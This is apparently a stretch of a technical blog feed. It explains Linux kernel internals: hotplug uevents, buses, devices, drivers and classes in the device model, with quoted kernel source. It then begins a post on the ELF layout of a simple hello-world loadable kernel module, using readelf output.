<p>The hotplug mechanism can be described as follows: when a device is plugged into the system, the kernel notifies a userspace program, which loads the device’s driver; when the device is removed, the driver can be removed too. There are two methods to notify userspace: one is udev and the other is /sbin/hotplug. Both need the kernel’s support in ‘kobject_uevent’. This function is the base of both udev and /sbin/hotplug; it can send a uevent or call the call_usermodehelper function to create a user process.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int kobject_uevent(struct kobject *kobj, enum kobject_action action)
{
return kobject_uevent_env(kobj, action, NULL);
}
int kobject_uevent_env(struct kobject *kobj, enum kobject_action action,
char *envp_ext[])
{
struct kobj_uevent_env *env;
const char *action_string = kobject_actions[action];
const char *devpath = NULL;
const char *subsystem;
struct kobject *top_kobj;
struct kset *kset;
const struct kset_uevent_ops *uevent_ops;
int i = 0;
int retval = 0;
#ifdef CONFIG_NET
struct uevent_sock *ue_sk;
#endif
pr_debug("kobject: '%s' (%p): %s\n",
kobject_name(kobj), kobj, __func__);
/* search the kset we belong to */
top_kobj = kobj;
while (!top_kobj->kset && top_kobj->parent)
top_kobj = top_kobj->parent;
if (!top_kobj->kset) {
pr_debug("kobject: '%s' (%p): %s: attempted to send uevent "
"without kset!\n", kobject_name(kobj), kobj,
__func__);
return -EINVAL;
}
kset = top_kobj->kset;
uevent_ops = kset->uevent_ops;
/* skip the event, if uevent_suppress is set*/
if (kobj->uevent_suppress) {
pr_debug("kobject: '%s' (%p): %s: uevent_suppress "
"caused the event to drop!\n",
kobject_name(kobj), kobj, __func__);
return 0;
}
/* skip the event, if the filter returns zero. */
if (uevent_ops && uevent_ops->filter)
if (!uevent_ops->filter(kset, kobj)) {
pr_debug("kobject: '%s' (%p): %s: filter function "
"caused the event to drop!\n",
kobject_name(kobj), kobj, __func__);
return 0;
}
/* default keys */
retval = add_uevent_var(env, "ACTION=%s", action_string);
if (retval)
goto exit;
retval = add_uevent_var(env, "DEVPATH=%s", devpath);
if (retval)
goto exit;
retval = add_uevent_var(env, "SUBSYSTEM=%s", subsystem);
if (retval)
goto exit;
/* let the kset specific function add its stuff */
if (uevent_ops && uevent_ops->uevent) {
retval = uevent_ops->uevent(kset, kobj, env);
if (retval) {
pr_debug("kobject: '%s' (%p): %s: uevent() returned "
"%d\n", kobject_name(kobj), kobj,
__func__, retval);
goto exit;
}
}
mutex_lock(&uevent_sock_mutex);
#if defined(CONFIG_NET)
/* send netlink message */
list_for_each_entry(ue_sk, &uevent_sock_list, list) {
struct sock *uevent_sock = ue_sk->sk;
struct sk_buff *skb;
size_t len;
if (!netlink_has_listeners(uevent_sock, 1))
continue;
/* allocate message with the maximum possible size */
len = strlen(action_string) + strlen(devpath) + 2;
skb = alloc_skb(len + env->buflen, GFP_KERNEL);
if (skb) {
char *scratch;
/* add header */
scratch = skb_put(skb, len);
sprintf(scratch, "%s@%s", action_string, devpath);
/* copy keys to our continuous event payload buffer */
for (i = 0; i < env->envp_idx; i++) {
len = strlen(env->envp[i]) + 1;
scratch = skb_put(skb, len);
strcpy(scratch, env->envp[i]);
}
NETLINK_CB(skb).dst_group = 1;
retval = netlink_broadcast_filtered(uevent_sock, skb,
0, 1, GFP_KERNEL,
kobj_bcast_filter,
kobj);
/* ENOBUFS should be handled in userspace */
if (retval == -ENOBUFS || retval == -ESRCH)
retval = 0;
} else
retval = -ENOMEM;
}
#endif
mutex_unlock(&uevent_sock_mutex);
/* call uevent_helper, usually only enabled during early boot */
if (uevent_helper[0] && !kobj_usermode_filter(kobj)) {
char *argv [3];
argv [0] = uevent_helper;
argv [1] = (char *)subsystem;
argv [2] = NULL;
retval = add_uevent_var(env, "HOME=/");
if (retval)
goto exit;
retval = add_uevent_var(env,
"PATH=/sbin:/bin:/usr/sbin:/usr/bin");
if (retval)
goto exit;
retval = call_usermodehelper(argv[0], argv,
env->envp, UMH_WAIT_EXEC);
}
exit:
kfree(devpath);
kfree(env);
return retval;
}
</code></pre></div></div>
<p>Generally, there are three steps in kobject_uevent_env.
First, find the topmost kset, then call the filter of kset->uevent_ops.
Second, set the environment variables and call uevent_ops->uevent.
Finally, if CONFIG_NET is defined it sends the uevent message to userspace over netlink; it may also call call_usermodehelper to launch a user process from the kernel.</p>
<h2 id="bus">bus</h2>
<p>The bus is one of the core concepts in the Linux device driver model. Devices and drivers revolve around buses. A bus is such low-level infrastructure that device driver programmers rarely get the chance to write one. A bus can be backed by a physical bus such as the PCI bus, or be a purely virtual concept such as the virtio bus.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct bus_type {
const char *name;
const char *dev_name;
struct device *dev_root;
struct device_attribute *dev_attrs; /* use dev_groups instead */
const struct attribute_group **bus_groups;
const struct attribute_group **dev_groups;
const struct attribute_group **drv_groups;
int (*match)(struct device *dev, struct device_driver *drv);
int (*uevent)(struct device *dev, struct kobj_uevent_env *env);
int (*probe)(struct device *dev);
int (*remove)(struct device *dev);
void (*shutdown)(struct device *dev);
int (*online)(struct device *dev);
int (*offline)(struct device *dev);
int (*suspend)(struct device *dev, pm_message_t state);
int (*resume)(struct device *dev);
const struct dev_pm_ops *pm;
struct iommu_ops *iommu_ops;
struct subsys_private *p;
struct lock_class_key lock_key;
};
</code></pre></div></div>
<p>‘match’ is called whenever a new device or driver is added to this bus.
‘p’, a struct subsys_private, is used to manage the devices and drivers on this bus.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct subsys_private {
struct kset subsys;
struct kset *devices_kset;
struct list_head interfaces;
struct mutex mutex;
struct kset *drivers_kset;
struct klist klist_devices;
struct klist klist_drivers;
struct blocking_notifier_head bus_notifier;
unsigned int drivers_autoprobe:1;
struct bus_type *bus;
struct kset glue_dirs;
struct class *class;
};
</code></pre></div></div>
<p>‘subsys’ represents the subsystem this bus lies in. Every bus registered through bus_register gets the same bus_kset, so bus_kset is the container of all buses in the system.
‘devices_kset’ represents all the devices’ kset, and ‘drivers_kset’ represents all the drivers’ kset.
‘klist_devices’ and ‘klist_drivers’ link the devices and drivers on this bus.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> bus_type
+--------+
| name | bus_kset
+--------+ +--------------+
| | | |kobj| |
+--------+ +--------------+
| | ^
+--------+ | drivers_kset
| p | subsys_private | +--------------+
+--+-----+---> +---------------+ | | |kobj| |
^ | subsys +-----+ +--------------+
| +---------------+ ^
| | drivers_kset +----------+
| +---------------+ devices_kset
| | devices_kset +--------------> +--------------+
| +---------------+ | |kobj| |
| | klist_devices +-------+ dev +--------------+
| +---------------+ <----+ +----+ +----+
| | klist_drivers +--+ | +----> | +----> | |
| +---------------+ | +----+ +----+ +----+
| | | | drv
| +---------------+ +--> +----+ +----+ +----+
+-----------+ bus | | +----> | +----> | |
+---------------+ +----+ +----+ +----+
</code></pre></div></div>
<p>‘bus_register’ is used to register a bus to the system.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int bus_register(struct bus_type *bus)
{
int retval;
struct subsys_private *priv;
struct lock_class_key *key = &bus->lock_key;
priv = kzalloc(sizeof(struct subsys_private), GFP_KERNEL);
if (!priv)
return -ENOMEM;
priv->bus = bus;
bus->p = priv;
BLOCKING_INIT_NOTIFIER_HEAD(&priv->bus_notifier);
retval = kobject_set_name(&priv->subsys.kobj, "%s", bus->name);
if (retval)
goto out;
priv->subsys.kobj.kset = bus_kset;
priv->subsys.kobj.ktype = &bus_ktype;
priv->drivers_autoprobe = 1;
retval = kset_register(&priv->subsys);
if (retval)
goto out;
retval = bus_create_file(bus, &bus_attr_uevent);
if (retval)
goto bus_uevent_fail;
priv->devices_kset = kset_create_and_add("devices", NULL,
&priv->subsys.kobj);
if (!priv->devices_kset) {
retval = -ENOMEM;
goto bus_devices_fail;
}
priv->drivers_kset = kset_create_and_add("drivers", NULL,
&priv->subsys.kobj);
if (!priv->drivers_kset) {
retval = -ENOMEM;
goto bus_drivers_fail;
}
INIT_LIST_HEAD(&priv->interfaces);
__mutex_init(&priv->mutex, "subsys mutex", key);
klist_init(&priv->klist_devices, klist_devices_get, klist_devices_put);
klist_init(&priv->klist_drivers, NULL, NULL);
retval = add_probe_files(bus);
if (retval)
goto bus_probe_files_fail;
retval = bus_add_groups(bus, bus->bus_groups);
if (retval)
goto bus_groups_fail;
pr_debug("bus: '%s': registered\n", bus->name);
return 0;
...
return retval;
}
</code></pre></div></div>
<p>First, ‘kset_register’ creates a directory in /sys/bus, for example /sys/bus/pci.
Then two directories, devices and drivers, are created in /sys/bus/$bus using ‘kset_create_and_add’, for example /sys/bus/pci/devices and /sys/bus/pci/drivers.</p>
<p>A bus’ attributes represent information and configuration about the bus.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> bus_create_file(bus, &bus_attr_uevent);
</code></pre></div></div>
<p>BUS_ATTR is used to create bus attributes:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static BUS_ATTR(uevent, S_IWUSR, NULL, bus_uevent_store);
#define BUS_ATTR(_name, _mode, _show, _store) \
struct bus_attribute bus_attr_##_name = __ATTR(_name, _mode, _show, _store)
#define BUS_ATTR_RW(_name) \
struct bus_attribute bus_attr_##_name = __ATTR_RW(_name)
#define BUS_ATTR_RO(_name) \
struct bus_attribute bus_attr_##_name = __ATTR_RO(_name)
</code></pre></div></div>
<p>User space can read/write these attributes to control bus’s behavior.</p>
<h3 id="binding-the-device-and-driver">binding the device and driver</h3>
<p>Connecting a device with its corresponding driver is called binding. The bus does a lot of binding work behind the scenes for the device driver programmer. There are two events that trigger binding. When a device is registered on a bus by device_register, the kernel tries to bind it against every driver registered on that bus. When a driver is registered on a bus by driver_register, the kernel tries to bind it against every device registered on that bus.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int device_bind_driver(struct device *dev)
{
int ret;
ret = driver_sysfs_add(dev);
if (!ret)
driver_bound(dev);
return ret;
}
static void driver_bound(struct device *dev)
{
if (klist_node_attached(&dev->p->knode_driver)) {
printk(KERN_WARNING "%s: device %s already bound\n",
__func__, kobject_name(&dev->kobj));
return;
}
pr_debug("driver: '%s': %s: bound to device '%s'\n", dev_name(dev),
__func__, dev->driver->name);
klist_add_tail(&dev->p->knode_driver, &dev->driver->p->klist_devices);
/*
* Make sure the device is no longer in one of the deferred lists and
* kick off retrying all pending devices
*/
driver_deferred_probe_del(dev);
driver_deferred_probe_trigger();
if (dev->bus)
blocking_notifier_call_chain(&dev->bus->p->bus_notifier,
BUS_NOTIFY_BOUND_DRIVER, dev);
}
</code></pre></div></div>
<p>‘device_bind_driver’ calls ‘driver_bound’ to bind the device and driver.
It links the device private’s ‘knode_driver’ field into the driver private’s ‘klist_devices’.</p>
<h2 id="device">device</h2>
<p>Linux uses struct device to represent a device.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct device {
struct device *parent;
struct device_private *p;
struct kobject kobj;
const char *init_name; /* initial name of the device */
const struct device_type *type;
struct mutex mutex; /* mutex to synchronize calls to
* its driver.
*/
struct bus_type *bus; /* type of bus device is on */
struct device_driver *driver; /* which driver has allocated this
device */
void *platform_data; /* Platform specific data, device
core doesn't touch it */
struct dev_pm_info power;
struct dev_pm_domain *pm_domain;
#ifdef CONFIG_PINCTRL
struct dev_pin_info *pins;
#endif
#ifdef CONFIG_NUMA
int numa_node; /* NUMA node this device is close to */
#endif
u64 *dma_mask; /* dma mask (if dma'able device) */
u64 coherent_dma_mask;/* Like dma_mask, but for
alloc_coherent mappings as
not all hardware supports
64 bit addresses for consistent
allocations such descriptors. */
struct device_dma_parameters *dma_parms;
struct list_head dma_pools; /* dma pools (if dma'ble) */
struct dma_coherent_mem *dma_mem; /* internal for coherent mem
override */
#ifdef CONFIG_DMA_CMA
struct cma *cma_area; /* contiguous memory area for dma
allocations */
#endif
/* arch specific additions */
struct dev_archdata archdata;
struct device_node *of_node; /* associated device tree node */
struct acpi_dev_node acpi_node; /* associated ACPI device node */
dev_t devt; /* dev_t, creates the sysfs "dev" */
u32 id; /* device instance */
spinlock_t devres_lock;
struct list_head devres_head;
struct klist_node knode_class;
struct class *class;
const struct attribute_group **groups; /* optional groups */
void (*release)(struct device *dev);
struct iommu_group *iommu_group;
bool offline_disabled:1;
bool offline:1;
};
</code></pre></div></div>
<p>‘parent’ points to the parent device.
‘kobj’ represents the device’s kobject in the kernel.
‘driver’ indicates whether this device has been bound to a driver; if it is NULL, the device has not found its driver yet.</p>
<p>Every device in the system is an object of struct device, so the kernel uses a kset, devices_kset, as the container of devices. The kernel classifies devices into two classes, block and char. Each class has a kobject, sysfs_dev_block_kobj and sysfs_dev_char_kobj. They are initialized in ‘devices_init’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int __init devices_init(void)
{
devices_kset = kset_create_and_add("devices", &device_uevent_ops, NULL);
if (!devices_kset)
return -ENOMEM;
dev_kobj = kobject_create_and_add("dev", NULL);
if (!dev_kobj)
goto dev_kobj_err;
sysfs_dev_block_kobj = kobject_create_and_add("block", dev_kobj);
if (!sysfs_dev_block_kobj)
goto block_kobj_err;
sysfs_dev_char_kobj = kobject_create_and_add("char", dev_kobj);
if (!sysfs_dev_char_kobj)
goto char_kobj_err;
return 0;
char_kobj_err:
kobject_put(sysfs_dev_block_kobj);
block_kobj_err:
kobject_put(dev_kobj);
dev_kobj_err:
kset_unregister(devices_kset);
return -ENOMEM;
}
</code></pre></div></div>
<p>So this function generates the following directories: /sys/devices, /sys/dev, /sys/dev/block and /sys/dev/char.</p>
<p>device_register is used to register a device with the system. It first calls device_initialize to initialize some fields of the device, and then calls device_add.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int device_register(struct device *dev)
{
device_initialize(dev);
return device_add(dev);
}
void device_initialize(struct device *dev)
{
dev->kobj.kset = devices_kset;
kobject_init(&dev->kobj, &device_ktype);
INIT_LIST_HEAD(&dev->dma_pools);
mutex_init(&dev->mutex);
lockdep_set_novalidate_class(&dev->mutex);
spin_lock_init(&dev->devres_lock);
INIT_LIST_HEAD(&dev->devres_head);
device_pm_init(dev);
set_dev_node(dev, -1);
}
</code></pre></div></div>
<p>‘device_add’ does a lot of work.
First it creates the topology in sysfs.
1) If both ‘dev->class’ and ‘dev->parent’ are NULL and the device is attached to a bus, the parent is the bus’s root device</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> if (!parent && dev->bus && dev->bus->dev_root)
return &dev->bus->dev_root->kobj;
</code></pre></div></div>
<p>2) If ‘dev->class’ is NULL and ‘dev->parent’ is not NULL, the easy case: dev’s directory is under ‘dev->parent->kobj’</p>
<p>3) If ‘dev->class’ is not NULL and ‘dev->parent’ is NULL, dev’s directory is in /sys/devices/virtual</p>
<p>4) If both ‘dev->class’ and ‘dev->parent’ are not NULL, the most complicated case, omitted here.</p>
<p>Second, it creates some attribute files for this device. If its major number is not zero, it calls ‘devtmpfs_create_node’ to create a node in devtmpfs.</p>
<p>Then it tries to bind the device with the drivers on the bus.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void bus_probe_device(struct device *dev)
{
struct bus_type *bus = dev->bus;
struct subsys_interface *sif;
int ret;
if (!bus)
return;
if (bus->p->drivers_autoprobe) {
ret = device_attach(dev);
WARN_ON(ret < 0);
}
mutex_lock(&bus->p->mutex);
list_for_each_entry(sif, &bus->p->interfaces, node)
if (sif->add_dev)
sif->add_dev(dev, sif);
mutex_unlock(&bus->p->mutex);
}
int device_attach(struct device *dev)
{
int ret = 0;
device_lock(dev);
if (dev->driver) {
if (klist_node_attached(&dev->p->knode_driver)) {
ret = 1;
goto out_unlock;
}
ret = device_bind_driver(dev);
if (ret == 0)
ret = 1;
else {
dev->driver = NULL;
ret = 0;
}
} else {
ret = bus_for_each_drv(dev->bus, NULL, dev, __device_attach);
pm_request_idle(dev);
}
out_unlock:
device_unlock(dev);
return ret;
}
</code></pre></div></div>
<p>If this device already has a driver, we just need to call ‘device_bind_driver’ to establish the relation between device and driver.
If this device has no driver, we need to iterate over every driver on ‘dev->bus’ and call __device_attach</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int __device_attach(struct device_driver *drv, void *data)
{
struct device *dev = data;
if (!driver_match_device(drv, dev))
return 0;
return driver_probe_device(drv, dev);
}
static inline int driver_match_device(struct device_driver *drv,
struct device *dev)
{
return drv->bus->match ? drv->bus->match(dev, drv) : 1;
}
</code></pre></div></div>
<p>If the driver’s bus defines a match method, call it; a return value of 1 means match, 0 means no match. If the bus has no match method, everything matches.
If the device and the driver match, call ‘driver_probe_device’ to bind them:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int driver_probe_device(struct device_driver *drv, struct device *dev)
{
int ret = 0;
if (!device_is_registered(dev))
return -ENODEV;
pr_debug("bus: '%s': %s: matched device %s with driver %s\n",
drv->bus->name, __func__, dev_name(dev), drv->name);
pm_runtime_barrier(dev);
ret = really_probe(dev, drv);
pm_request_idle(dev);
return ret;
}
static int really_probe(struct device *dev, struct device_driver *drv)
{
int ret = 0;
atomic_inc(&probe_count);
pr_debug("bus: '%s': %s: probing driver %s with device %s\n",
drv->bus->name, __func__, drv->name, dev_name(dev));
WARN_ON(!list_empty(&dev->devres_head));
dev->driver = drv;
/* If using pinctrl, bind pins now before probing */
ret = pinctrl_bind_pins(dev);
if (ret)
goto probe_failed;
if (driver_sysfs_add(dev)) {
printk(KERN_ERR "%s: driver_sysfs_add(%s) failed\n",
__func__, dev_name(dev));
goto probe_failed;
}
if (dev->bus->probe) {
ret = dev->bus->probe(dev);
if (ret)
goto probe_failed;
} else if (drv->probe) {
ret = drv->probe(dev);
if (ret)
goto probe_failed;
}
driver_bound(dev);
ret = 1;
pr_debug("bus: '%s': %s: bound device %s to driver %s\n",
drv->bus->name, __func__, dev_name(dev), drv->name);
...
}
</code></pre></div></div>
<p>If the device’s bus defines a probe function it is called; otherwise the driver’s probe function is called.
Finally ‘driver_bound’ is called to establish the relations.</p>
<h2 id="driver">driver</h2>
<p>struct device_driver represents a device driver.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct device_driver {
const char *name;
struct bus_type *bus;
struct module *owner;
const char *mod_name; /* used for built-in modules */
bool suppress_bind_attrs; /* disables bind/unbind via sysfs */
const struct of_device_id *of_match_table;
const struct acpi_device_id *acpi_match_table;
int (*probe) (struct device *dev);
int (*remove) (struct device *dev);
void (*shutdown) (struct device *dev);
int (*suspend) (struct device *dev, pm_message_t state);
int (*resume) (struct device *dev);
const struct attribute_group **groups;
const struct dev_pm_ops *pm;
struct driver_private *p;
};
</code></pre></div></div>
<p>‘driver_find’ is used to find a driver on a bus.
‘driver_register’ is used to register a driver with the system.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int driver_register(struct device_driver *drv)
{
int ret;
struct device_driver *other;
BUG_ON(!drv->bus->p);
if ((drv->bus->probe && drv->probe) ||
(drv->bus->remove && drv->remove) ||
(drv->bus->shutdown && drv->shutdown))
printk(KERN_WARNING "Driver '%s' needs updating - please use "
"bus_type methods\n", drv->name);
other = driver_find(drv->name, drv->bus);
if (other) {
printk(KERN_ERR "Error: Driver '%s' is already registered, "
"aborting...\n", drv->name);
return -EBUSY;
}
ret = bus_add_driver(drv);
if (ret)
return ret;
ret = driver_add_groups(drv, drv->groups);
if (ret) {
bus_remove_driver(drv);
return ret;
}
kobject_uevent(&drv->p->kobj, KOBJ_ADD);
return ret;
}
int bus_add_driver(struct device_driver *drv)
{
struct bus_type *bus;
struct driver_private *priv;
int error = 0;
bus = bus_get(drv->bus);
if (!bus)
return -EINVAL;
pr_debug("bus: '%s': add driver %s\n", bus->name, drv->name);
priv = kzalloc(sizeof(*priv), GFP_KERNEL);
if (!priv) {
error = -ENOMEM;
goto out_put_bus;
}
klist_init(&priv->klist_devices, NULL, NULL);
priv->driver = drv;
drv->p = priv;
priv->kobj.kset = bus->p->drivers_kset;
error = kobject_init_and_add(&priv->kobj, &driver_ktype, NULL,
"%s", drv->name);
if (error)
goto out_unregister;
klist_add_tail(&priv->knode_bus, &bus->p->klist_drivers);
if (drv->bus->p->drivers_autoprobe) {
error = driver_attach(drv);
if (error)
goto out_unregister;
}
module_add_driver(drv->owner, drv);
error = driver_create_file(drv, &driver_attr_uevent);
if (error) {
printk(KERN_ERR "%s: uevent attr (%s) failed\n",
__func__, drv->name);
}
error = driver_add_groups(drv, bus->drv_groups);
if (error) {
/* How the hell do we get out of this pickle? Give up */
printk(KERN_ERR "%s: driver_create_groups(%s) failed\n",
__func__, drv->name);
}
if (!drv->suppress_bind_attrs) {
error = add_bind_files(drv);
if (error) {
/* Ditto */
printk(KERN_ERR "%s: add_bind_files(%s) failed\n",
__func__, drv->name);
}
}
return 0;
out_unregister:
kobject_put(&priv->kobj);
kfree(drv->p);
drv->p = NULL;
out_put_bus:
bus_put(bus);
return error;
}
</code></pre></div></div>
<p>‘bus_add_driver’ does the real work: it first allocates and initializes a ‘driver_private’ struct.
Then it calls ‘driver_attach’, which calls ‘__driver_attach’ for every device on the bus:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int __driver_attach(struct device *dev, void *data)
{
struct device_driver *drv = data;
/*
* Lock device and try to bind to it. We drop the error
* here and always return 0, because we need to keep trying
* to bind to devices and some drivers will return an error
* simply if it didn't support the device.
*
* driver_probe_device() will spit a warning if there
* is an error.
*/
if (!driver_match_device(drv, dev))
return 0;
if (dev->parent) /* Needed for USB */
device_lock(dev->parent);
device_lock(dev);
if (!dev->driver)
driver_probe_device(drv, dev);
device_unlock(dev);
if (dev->parent)
device_unlock(dev->parent);
return 0;
}
</code></pre></div></div>
<p>In ‘__driver_attach’, it calls both ‘driver_match_device’ and ‘driver_probe_device’, the same as ‘__device_attach’.</p>
<p>‘bus_add_driver’ will also create some attribute files.</p>
<h2 id="class">class</h2>
<p>A class is a higher-level abstraction of devices; it classifies devices according to their functionality.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct class {
const char *name;
struct module *owner;
struct class_attribute *class_attrs;
const struct attribute_group **dev_groups;
struct kobject *dev_kobj;
int (*dev_uevent)(struct device *dev, struct kobj_uevent_env *env);
char *(*devnode)(struct device *dev, umode_t *mode);
void (*class_release)(struct class *class);
void (*dev_release)(struct device *dev);
int (*suspend)(struct device *dev, pm_message_t state);
int (*resume)(struct device *dev);
const struct kobj_ns_type_operations *ns_type;
const void *(*namespace)(struct device *dev);
const struct dev_pm_ops *pm;
struct subsys_private *p;
};
</code></pre></div></div>
<p>‘classes_init’ creates a root directory in sysfs.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int __init classes_init(void)
{
class_kset = kset_create_and_add("class", NULL, NULL);
if (!class_kset)
return -ENOMEM;
return 0;
}
</code></pre></div></div>
<p>A class is created using ‘class_create’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define class_create(owner, name) \
({ \
static struct lock_class_key __key; \
__class_create(owner, name, &__key); \
})
struct class *__class_create(struct module *owner, const char *name,
struct lock_class_key *key)
{
struct class *cls;
int retval;
cls = kzalloc(sizeof(*cls), GFP_KERNEL);
if (!cls) {
retval = -ENOMEM;
goto error;
}
cls->name = name;
cls->owner = owner;
cls->class_release = class_create_release;
retval = __class_register(cls, key);
if (retval)
goto error;
return cls;
error:
kfree(cls);
return ERR_PTR(retval);
}
EXPORT_SYMBOL_GPL(__class_create);
</code></pre></div></div>
<p>Again, ‘__class_register’ does the tough work. Its most important job is to create a directory in /sys/class.</p>
<p>Let’s see how a class affects device creation.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct device *device_create(struct class *class, struct device *parent,
dev_t devt, void *drvdata, const char *fmt, ...)
{
va_list vargs;
struct device *dev;
va_start(vargs, fmt);
dev = device_create_vargs(class, parent, devt, drvdata, fmt, vargs);
va_end(vargs);
return dev;
}
static struct device *
device_create_groups_vargs(struct class *class, struct device *parent,
dev_t devt, void *drvdata,
const struct attribute_group **groups,
const char *fmt, va_list args)
{
struct device *dev = NULL;
int retval = -ENODEV;
if (class == NULL || IS_ERR(class))
goto error;
dev = kzalloc(sizeof(*dev), GFP_KERNEL);
if (!dev) {
retval = -ENOMEM;
goto error;
}
dev->devt = devt;
dev->class = class;
dev->parent = parent;
dev->groups = groups;
dev->release = device_create_release;
dev_set_drvdata(dev, drvdata);
retval = kobject_set_name_vargs(&dev->kobj, fmt, args);
if (retval)
goto error;
retval = device_register(dev);
if (retval)
goto error;
return dev;
error:
put_device(dev);
return ERR_PTR(retval);
}
</code></pre></div></div>
<p>Here we see that ‘dev->class’ is set to the class. As we discussed for ‘device_register’, the class and parent both influence the directory in which the device is placed.</p>
Anatomy of the Linux loadable kernel module2018-06-02T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/06/02/linux-loadable-module
<p>Loadable modules play a very important role in modern applications and operating systems. Nearly all processes use loadable modules, for example .so files on Linux and .dll files on Windows. Operating systems can also benefit from loadable modules: a running Linux kernel can insert a .ko driver file, and Windows has a corresponding mechanism. This article digs into the anatomy of the Linux loadable kernel module. We will use the very simple loadable kernel module below to guide our discussion.</p>
<p>hello.c:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <linux/kernel.h>
#include <linux/module.h>
int testexport(void)
{
printk("in testexport\n");
return 0;
}
EXPORT_SYMBOL(testexport);
int hello_init(void) {
printk(KERN_INFO "Hello World!\n");
return 0;
}
void hello_exit(void) {
printk(KERN_INFO "Bye World!\n");
}
module_init(hello_init);
module_exit(hello_exit);
</code></pre></div></div>
<p>Below is the Makefile:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>obj-m += hello.o
all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
</code></pre></div></div>
<p>When we compile the kernel module, it generates a hello.ko file. Insert the .ko into the kernel using “insmod hello.ko” and you will see “Hello World” in dmesg; remove it using “rmmod hello” and you will see “Bye World”.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[469345.236572] Hello World!
[469356.544498] Bye World!
</code></pre></div></div>
<h1 id="file-format">File Format</h1>
<p>.ko is an ELF file, which stands for “Executable and Linking Format”, the standard executable file format on Linux.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># file hello.ko
hello.ko: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), BuildID[sha1]=28772d0d39be18e530b2b788dbf79acfabf189d6, not stripped
</code></pre></div></div>
<p>Below is the typical .ko file layout on disk.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>e_shoff +------------------+
+----+ ELF header |
| +------------------+ <------+
| | | |
| | section 1 | |
| | | |
| +------------------+ |
| | section 2 | <---+ |
| +------------------+ | |
| | section 3 | <+ | |
+--> +------------------+ | | |
| section header 1 +--------+
+------------------+ | |
| section header 2 +-----+
+------------------+ | sh_offset
| section header 3 +--+
+------------------+
</code></pre></div></div>
<p>In general, a static ELF file contains three portions: the ELF header, several sections, and finally the section header table. Notice that here we omit the optional program header table, as .ko files don’t use it.</p>
<h2 id="elf-header">ELF header</h2>
<p>The ELF header describes the overall information of the file and lies in the first portion of the ELF file. We can use readelf to read the header.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># readelf -h hello.ko
ELF Header:
Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
Class: ELF64
Data: 2's complement, little endian
Version: 1 (current)
OS/ABI: UNIX - System V
ABI Version: 0
Type: REL (Relocatable file)
Machine: Advanced Micro Devices X86-64
Version: 0x1
Entry point address: 0x0
Start of program headers: 0 (bytes into file)
Start of section headers: 285368 (bytes into file)
Flags: 0x0
Size of this header: 64 (bytes)
Size of program headers: 0 (bytes)
Number of program headers: 0
Size of section headers: 64 (bytes)
Number of section headers: 33
Section header string table index: 3
</code></pre></div></div>
<p>Using hexdump we can see the raw data.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0000000 457f 464c 0102 0001 0000 0000 0000 0000
0000010 0001 003e 0001 0000 0000 0000 0000 0000
0000020 0000 0000 0000 0000 5ab8 0004 0000 0000
0000030 0000 0000 0040 0000 0000 0040 0021 0020
</code></pre></div></div>
<p>Structure represented:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>typedef struct
{
unsigned char e_ident[16]; /* ELF identification */
Elf64_Half e_type; /* Object file type */
Elf64_Half e_machine; /* Machine type */
Elf64_Word e_version; /* Object file version */
Elf64_Addr e_entry; /* Entry point address */
Elf64_Off e_phoff; /* Program header offset */
Elf64_Off e_shoff; /* Section header offset */
Elf64_Word e_flags; /* Processor-specific flags */
Elf64_Half e_ehsize; /* ELF header size */
Elf64_Half e_phentsize; /* Size of program header entry */
Elf64_Half e_phnum; /* Number of program header entries */
Elf64_Half e_shentsize; /* Size of section header entry */
Elf64_Half e_shnum; /* Number of section header entries */
Elf64_Half e_shstrndx; /* Section name string table index */
} Elf64_Ehdr;
</code></pre></div></div>
<p>The comments describe each field’s meaning.</p>
<h2 id="sections">Sections</h2>
